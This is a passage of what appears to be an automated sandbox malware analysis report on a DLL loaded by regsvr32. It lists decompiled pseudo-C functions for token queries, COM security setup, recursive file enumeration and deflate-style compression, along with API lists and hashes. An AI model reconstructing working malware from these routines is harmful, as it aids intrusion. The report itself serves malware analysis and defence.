                            					_t33 = _t9;
                            					_v8 = _t33;
                            					while(1) {
                            						_push(_v12);
                            						_push( *_t33);
                            						_t34 =  *0x1001e68c; // 0x2e0fc68
                            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                            							break;
                            						}
                            						_t37 = _t37 + 1;
                            						_t33 = _v8 + 8;
                            						_v8 = _t33;
                            						if(_t37 <  *_t48) {
                            							continue;
                            						}
                            						goto L9;
                            					}
                            					_t45 = 1;
                            					goto L9;
                            				}
                            				return _t20;
                            			}

                            APIs
                              • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                              • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                              • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                              • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                              • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                            • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
                            • String ID:
                            • API String ID: 3752664914-0
                            • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                            • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
                            • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                            • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 30%
                            			E1000D523(void* __ecx) {
                            				char _v8;
                            				void* _v12;
                            				char* _t15;
                            				intOrPtr* _t16;
                            				void* _t21;
                            				intOrPtr* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t25;
                            				void* _t30;
                            				void* _t33;
                            
                            				_v12 = 0;
                            				_v8 = 0;
                            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                            				_t15 =  &_v12;
                            				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                            				if(_t15 < 0) {
                            					L5:
                            					_t23 = _v8;
                            					if(_t23 != 0) {
                            						 *((intOrPtr*)( *_t23 + 8))(_t23);
                            					}
                            					_t24 = _v12;
                            					if(_t24 != 0) {
                            						 *((intOrPtr*)( *_t24 + 8))(_t24);
                            					}
                            					_t16 = 0;
                            				} else {
                            					__imp__#2(__ecx);
                            					_t25 = _v12;
                            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                            					if(_t21 < 0) {
                            						goto L5;
                            					} else {
                            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                            						if(_t21 < 0) {
                            							goto L5;
                            						} else {
                            							_t16 = E10008604(8);
                            							if(_t16 == 0) {
                            								goto L5;
                            							} else {
                            								 *((intOrPtr*)(_t16 + 4)) = _v12;
                            								 *_t16 = _v8;
                            							}
                            						}
                            					}
                            				}
                            				return _t16;
                            			}

                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                            • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 2855449287-0
                            • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                            • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
                            				char _v12;
                            				WCHAR* _v16;
                            				short _v560;
                            				short _v562;
                            				struct _WIN32_FIND_DATAW _v608;
                            				WCHAR* _t27;
                            				void* _t31;
                            				int _t36;
                            				intOrPtr _t37;
                            				intOrPtr _t44;
                            				void* _t48;
                            				intOrPtr _t49;
                            				void* _t51;
                            				intOrPtr _t56;
                            				void* _t61;
                            				char _t62;
                            				void* _t63;
                            				void* _t64;
                            				void* _t65;
                            				void* _t80;
                            
                            				_t80 = __fp0;
                            				_push(0);
                            				_t51 = __ecx;
                            				_push(L"\\*");
                            				_t27 = E100092E5(__ecx);
                            				_t65 = _t64 + 0xc;
                            				_v16 = _t27;
                            				if(_t27 == 0) {
                            					return _t27;
                            				}
                            				_t61 = FindFirstFileW(_t27,  &_v608);
                            				if(_t61 == 0xffffffff) {
                            					L18:
                            					return E1000861A( &_v16, 0xfffffffe);
                            				}
                            				_t31 = 0x2e;
                            				do {
                            					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
                            						if((_v608.dwFileAttributes & 0x00000010) != 0) {
                            							L14:
                            							_push(0);
                            							_push( &(_v608.cFileName));
                            							_push("\\");
                            							_t62 = E100092E5(_t51);
                            							_t65 = _t65 + 0x10;
                            							_v12 = _t62;
                            							if(_t62 != 0) {
                            								_t56 =  *0x1001e684; // 0x2e0faa0
                            								 *((intOrPtr*)(_t56 + 0xb4))(1);
                            								_push(1);
                            								_push(1);
                            								_push(0);
                            								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
                            								_t65 = _t65 + 0x1c;
                            								E1000861A( &_v12, 0xfffffffe);
                            							}
                            							goto L16;
                            						}
                            						_t63 = 0;
                            						do {
                            							_t10 = _t63 + 0x1001e78c; // 0x0
                            							_push( *_t10);
                            							_push( &(_v608.cFileName));
                            							_t44 =  *0x1001e690; // 0x2e0fd40
                            							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
                            								goto L12;
                            							}
                            							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
                            							_t65 = _t65 + 0xc;
                            							if(_t48 == 0) {
                            								break;
                            							}
                            							_t49 =  *0x1001e684; // 0x2e0faa0
                            							 *((intOrPtr*)(_t49 + 0xb4))(1);
                            							L12:
                            							_t63 = _t63 + 4;
                            						} while (_t63 < 4);
                            						if((_v608.dwFileAttributes & 0x00000010) == 0) {
                            							goto L16;
                            						}
                            						goto L14;
                            					}
                            					L16:
                            					_t36 = FindNextFileW(_t61,  &_v608);
                            					_t31 = 0x2e;
                            				} while (_t36 != 0);
                            				_t37 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t37 + 0x78))(_t61);
                            				goto L18;
                            			}

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
                            • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNext
                            • String ID:
                            • API String ID: 1690352074-0
                            • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                            • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
                            • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                            • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1518329722-0
                            • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                            • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
                            • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                            • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
                            				signed int _v8;
                            				signed short* _v12;
                            				char _v16;
                            				signed short _v20;
                            				unsigned int _v24;
                            				signed short _v28;
                            				signed int _t223;
                            				signed int _t235;
                            				signed int _t237;
                            				signed short _t240;
                            				signed int _t241;
                            				signed short _t244;
                            				signed int _t245;
                            				signed short _t248;
                            				signed int _t249;
                            				signed int _t250;
                            				void* _t254;
                            				signed char _t259;
                            				signed int _t275;
                            				signed int _t289;
                            				signed int _t308;
                            				signed short _t316;
                            				signed int _t321;
                            				void* _t329;
                            				signed short _t330;
                            				signed short _t333;
                            				signed short _t334;
                            				signed short _t343;
                            				signed short _t346;
                            				signed short _t347;
                            				signed short _t348;
                            				signed short _t358;
                            				signed short _t361;
                            				signed short _t362;
                            				signed short _t363;
                            				signed short _t370;
                            				signed int _t373;
                            				signed int _t378;
                            				signed short _t379;
                            				signed short _t382;
                            				unsigned int _t388;
                            				unsigned short _t390;
                            				unsigned short _t392;
                            				unsigned short _t394;
                            				signed int _t396;
                            				signed int _t397;
                            				signed int _t398;
                            				signed int _t400;
                            				signed short _t401;
                            				signed int _t402;
                            				signed int _t403;
                            				signed int _t407;
                            				signed int _t409;
                            
                            				_t223 = _a8;
                            				_t235 =  *(_t223 + 2) & 0x0000ffff;
                            				_push(_t397);
                            				_t388 = 0;
                            				_t398 = _t397 | 0xffffffff;
                            				if(_a12 < 0) {
                            					L42:
                            					return _t223;
                            				} else {
                            					_t329 = (_t235 != 0) ? 7 : 0x8a;
                            					_v12 = _t223 + 6;
                            					_t254 = (0 | _t235 != 0x00000000) + 3;
                            					_v16 = _a12 + 1;
                            					do {
                            						_v24 = _t388;
                            						_t388 = _t388 + 1;
                            						_a8 = _t235;
                            						_a12 = _t235;
                            						_v8 =  *_v12 & 0x0000ffff;
                            						_t223 = _a4;
                            						if(_t388 >= _t329) {
                            							L4:
                            							if(_t388 >= _t254) {
                            								if(_a8 == 0) {
                            									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
                            									_t400 =  *_t122;
                            									if(_t388 > 0xa) {
                            										_t168 = _t223 + 0xac4; // 0x5dc03300
                            										_t330 =  *_t168 & 0x0000ffff;
                            										_t169 = _t223 + 0xac6; // 0x55c35dc0
                            										_t237 =  *_t169 & 0x0000ffff;
                            										_v24 = _t330;
                            										_t171 = _t223 + 0x16b8; // 0xfffffe8b
                            										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                            										_v28 = _t333;
                            										if(_t400 <= 0x10 - _t237) {
                            											_t259 = _t400 + _t237;
                            										} else {
                            											_t173 = _t223 + 0x14; // 0xc703f045
                            											 *(_t223 + 0x16b8) = _t333;
                            											_t175 = _t223 + 8; // 0x8d000040
                            											 *((char*)( *_t175 +  *_t173)) = _v28;
                            											_t223 = _a4;
                            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            											_t181 = _t223 + 0x14; // 0xc703f045
                            											_t182 = _t223 + 8; // 0x8d000040
                            											_t183 = _t223 + 0x16b9; // 0x89fffffe
                            											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            											_t333 = _v24 >> 0x10;
                            											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
                            											_t259 =  *_t189 + 0xfffffff0 + _t237;
                            										}
                            										_t334 = _t333 & 0x0000ffff;
                            										 *(_t223 + 0x16bc) = _t259;
                            										 *(_t223 + 0x16b8) = _t334;
                            										_t401 = _t334 & 0x0000ffff;
                            										if(_t259 <= 9) {
                            											_t209 = _t388 - 0xb; // -10
                            											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                            											 *(_t223 + 0x16bc) = _t259 + 7;
                            										} else {
                            											_t193 = _t223 + 8; // 0x8d000040
                            											_t390 = _t388 + 0xfffffff5;
                            											_t194 = _t223 + 0x14; // 0xc703f045
                            											_t240 = _t390 << _t259 | _t401;
                            											 *(_t223 + 0x16b8) = _t240;
                            											 *( *_t193 +  *_t194) = _t240;
                            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            											_t199 = _t223 + 0x14; // 0xc703f045
                            											_t200 = _t223 + 8; // 0x8d000040
                            											_t201 = _t223 + 0x16b9; // 0x89fffffe
                            											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                            											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                            										}
                            										goto L35;
                            									}
                            									_t123 = _t223 + 0xac0; // 0x4e9
                            									_t343 =  *_t123 & 0x0000ffff;
                            									_t124 = _t223 + 0xac2; // 0x33000000
                            									_t241 =  *_t124 & 0x0000ffff;
                            									_v24 = _t343;
                            									_t126 = _t223 + 0x16b8; // 0xfffffe8b
                            									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                            									_v28 = _t346;
                            									if(_t400 > 0x10 - _t241) {
                            										_t128 = _t223 + 0x14; // 0xc703f045
                            										 *(_t223 + 0x16b8) = _t346;
                            										_t130 = _t223 + 8; // 0x8d000040
                            										 *((char*)( *_t130 +  *_t128)) = _v28;
                            										_t223 = _a4;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t136 = _t223 + 0x14; // 0xc703f045
                            										_t137 = _t223 + 8; // 0x8d000040
                            										_t138 = _t223 + 0x16b9; // 0x89fffffe
                            										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                            										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t346 = _v24 >> 0x10;
                            										_t400 =  *_t142 + 0xfffffff0;
                            									}
                            									_t403 = _t400 + _t241;
                            									_t347 = _t346 & 0x0000ffff;
                            									 *(_t223 + 0x16bc) = _t403;
                            									 *(_t223 + 0x16b8) = _t347;
                            									_t348 = _t347 & 0x0000ffff;
                            									if(_t403 <= 0xd) {
                            										_t163 = _t403 + 3; // 0x8b3c7e8c
                            										_t275 = _t163;
                            										L28:
                            										 *(_t223 + 0x16bc) = _t275;
                            										_t165 = _t388 - 3; // -2
                            										_t166 = _t223 + 0x16b8; // 0xfffffe8b
                            										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                            									} else {
                            										_t392 = _t388 + 0xfffffffd;
                            										_t147 = _t223 + 0x14; // 0xc703f045
                            										_t244 = _t392 << _t403 | _t348;
                            										_t148 = _t223 + 8; // 0x8d000040
                            										 *(_t223 + 0x16b8) = _t244;
                            										 *( *_t148 +  *_t147) = _t244;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t153 = _t223 + 0x14; // 0xc703f045
                            										_t154 = _t223 + 8; // 0x8d000040
                            										_t155 = _t223 + 0x16b9; // 0x89fffffe
                            										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                            										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                            									}
                            									goto L35;
                            								}
                            								_t289 = _a12;
                            								if(_t289 != _t398) {
                            									_t53 = _t289 * 4; // 0x238830a
                            									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                            									_t56 = _t235 * 4; // 0x830a74c0
                            									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                            									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
                            									_t407 =  *_t58;
                            									_v28 = _t370;
                            									_t60 = _t223 + 0x16b8; // 0xfffffe8b
                            									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                            									if(_t407 <= 0x10 - _t396) {
                            										_t373 = _t249;
                            										_t308 = _t407 + _t396;
                            									} else {
                            										_t61 = _t223 + 0x14; // 0xc703f045
                            										_t62 = _t223 + 8; // 0x8d000040
                            										 *(_t223 + 0x16b8) = _t249;
                            										 *( *_t62 +  *_t61) = _t249;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t67 = _t223 + 0x14; // 0xc703f045
                            										_t68 = _t223 + 8; // 0x8d000040
                            										_t69 = _t223 + 0x16b9; // 0x89fffffe
                            										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
                            										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                            										_t308 =  *_t75 + 0xfffffff0 + _t396;
                            									}
                            									_t388 = _v24;
                            									 *(_t223 + 0x16bc) = _t308;
                            									 *(_t223 + 0x16b8) = _t373;
                            								}
                            								_t80 = _t223 + 0xabc; // 0x5d0674c0
                            								_t358 =  *_t80 & 0x0000ffff;
                            								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
                            								_t402 =  *_t81;
                            								_t82 = _t223 + 0xabe; // 0x4e95d06
                            								_t245 =  *_t82 & 0x0000ffff;
                            								_v24 = _t358;
                            								_t84 = _t223 + 0x16b8; // 0xfffffe8b
                            								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                            								_v28 = _t361;
                            								if(_t402 > 0x10 - _t245) {
                            									_t86 = _t223 + 0x14; // 0xc703f045
                            									 *(_t223 + 0x16b8) = _t361;
                            									_t88 = _t223 + 8; // 0x8d000040
                            									 *((char*)( *_t88 +  *_t86)) = _v28;
                            									_t223 = _a4;
                            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            									_t94 = _t223 + 0x14; // 0xc703f045
                            									_t95 = _t223 + 8; // 0x8d000040
                            									_t96 = _t223 + 0x16b9; // 0x89fffffe
                            									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                            									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
                            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            									_t361 = _v24 >> 0x10;
                            									_t402 =  *_t100 + 0xfffffff0;
                            								}
                            								_t403 = _t402 + _t245;
                            								_t362 = _t361 & 0x0000ffff;
                            								 *(_t223 + 0x16bc) = _t403;
                            								 *(_t223 + 0x16b8) = _t362;
                            								_t363 = _t362 & 0x0000ffff;
                            								if(_t403 <= 0xe) {
                            									_t121 = _t403 + 2; // 0x8b3c7e8b
                            									_t275 = _t121;
                            									goto L28;
                            								} else {
                            									_t394 = _t388 + 0xfffffffd;
                            									_t105 = _t223 + 0x14; // 0xc703f045
                            									_t248 = _t394 << _t403 | _t363;
                            									_t106 = _t223 + 8; // 0x8d000040
                            									 *(_t223 + 0x16b8) = _t248;
                            									 *( *_t106 +  *_t105) = _t248;
                            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            									_t111 = _t223 + 0x14; // 0xc703f045
                            									_t112 = _t223 + 8; // 0x8d000040
                            									_t113 = _t223 + 0x16b9; // 0x89fffffe
                            									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                            									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                            									goto L35;
                            								}
                            							} else {
                            								_t316 = _t223 + (_t235 + 0x29f) * 4;
                            								_v28 = _t316;
                            								do {
                            									_t378 = _a12;
                            									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
                            									_t409 =  *_t22;
                            									_t24 = _t378 * 4; // 0x238830a
                            									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                            									_t379 =  *_t316 & 0x0000ffff;
                            									_v24 = _t379;
                            									_t27 = _t223 + 0x16b8; // 0xfffffe8b
                            									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                            									_v20 = _t382;
                            									if(_t409 <= 0x10 - _t250) {
                            										_t321 = _t409 + _t250;
                            									} else {
                            										_t29 = _t223 + 0x14; // 0xc703f045
                            										 *(_t223 + 0x16b8) = _t382;
                            										_t31 = _t223 + 8; // 0x8d000040
                            										 *((char*)( *_t31 +  *_t29)) = _v20;
                            										_t223 = _a4;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t37 = _t223 + 0x14; // 0xc703f045
                            										_t38 = _t223 + 8; // 0x8d000040
                            										_t39 = _t223 + 0x16b9; // 0x89fffffe
                            										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                            										_t382 = _v24 >> 0x10;
                            										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
                            										_t321 =  *_t45 + 0xfffffff0 + _t250;
                            									}
                            									 *(_t223 + 0x16bc) = _t321;
                            									_t316 = _v28;
                            									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                            									_t388 = _t388 - 1;
                            								} while (_t388 != 0);
                            								L35:
                            								_t235 = _v8;
                            								_t388 = 0;
                            								_t398 = _a12;
                            								if(_t235 != 0) {
                            									if(_a8 != _t235) {
                            										_t329 = 7;
                            										_t217 = _t329 - 3; // 0x4
                            										_t254 = _t217;
                            									} else {
                            										_t329 = 6;
                            										_t216 = _t329 - 3; // 0x3
                            										_t254 = _t216;
                            									}
                            								} else {
                            									_t329 = 0x8a;
                            									_t214 = _t388 + 3; // 0x3
                            									_t254 = _t214;
                            								}
                            								goto L41;
                            							}
                            						}
                            						_t223 = _a4;
                            						if(_t235 == _v8) {
                            							_t235 = _v8;
                            							goto L41;
                            						}
                            						goto L4;
                            						L41:
                            						_v12 =  &(_v12[2]);
                            						_t221 =  &_v16;
                            						 *_t221 = _v16 - 1;
                            					} while ( *_t221 != 0);
                            					goto L42;
                            				}
                            			}
                            0x1001706b
                            0x10017072
                            0x10017072
                            0x10017079
                            0x10017079
                            0x10017081
                            0x10017081
                            0x10017088
                            0x10017095
                            0x1001709e
                            0x100170a1
                            0x100170a6
                            0x100170a8
                            0x100170ab
                            0x100170b2
                            0x100170b8
                            0x100170bb
                            0x100170be
                            0x100170c1
                            0x100170c4
                            0x100170c7
                            0x100170cd
                            0x100170db
                            0x100170e1
                            0x100170e4
                            0x100170e7
                            0x100170e7
                            0x100170ea
                            0x100170ec
                            0x100170ef
                            0x100170f5
                            0x100170fc
                            0x10017102
                            0x1001715b
                            0x1001715b
                            0x00000000
                            0x10017104
                            0x10017104
                            0x1001710f
                            0x10017112
                            0x10017115
                            0x10017118
                            0x1001711f
                            0x10017122
                            0x10017125
                            0x10017128
                            0x1001712b
                            0x10017131
                            0x1001713d
                            0x10017142
                            0x1001714f
                            0x00000000
                            0x1001714f
                            0x10016f24
                            0x10016f2a
                            0x10016f2d
                            0x10016f30
                            0x10016f30
                            0x10016f33
                            0x10016f33
                            0x10016f39
                            0x10016f39
                            0x10016f41
                            0x10016f46
                            0x10016f53
                            0x10016f5c
                            0x10016f5f
                            0x10016f64
                            0x10016fac
                            0x10016f66
                            0x10016f66
                            0x10016f69
                            0x10016f70
                            0x10016f76
                            0x10016f79
                            0x10016f7c
                            0x10016f7f
                            0x10016f82
                            0x10016f85
                            0x10016f8b
                            0x10016f99
                            0x10016f9c
                            0x10016f9f
                            0x10016fa8
                            0x10016fa8
                            0x10016fb2
                            0x10016fb8
                            0x10016fbb
                            0x10016fc2
                            0x10016fc2
                            0x10017375
                            0x10017375
                            0x10017378
                            0x1001737a
                            0x1001737f
                            0x1001738e
                            0x1001739a
                            0x1001739f
                            0x1001739f
                            0x10017390
                            0x10017390
                            0x10017395
                            0x10017395
                            0x10017395
                            0x10017381
                            0x10017381
                            0x10017386
                            0x10017386
                            0x10017386
                            0x00000000
                            0x1001737f
                            0x10016f1e
                            0x10016f13
                            0x10016f16
                            0x100173a4
                            0x00000000
                            0x100173a4
                            0x00000000
                            0x100173a7
                            0x100173a7
                            0x100173ab
                            0x100173ab
                            0x100173ab
                            0x00000000
                            0x10016ef4

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                            • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
                            • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                            • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                            • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
                            • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                            • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
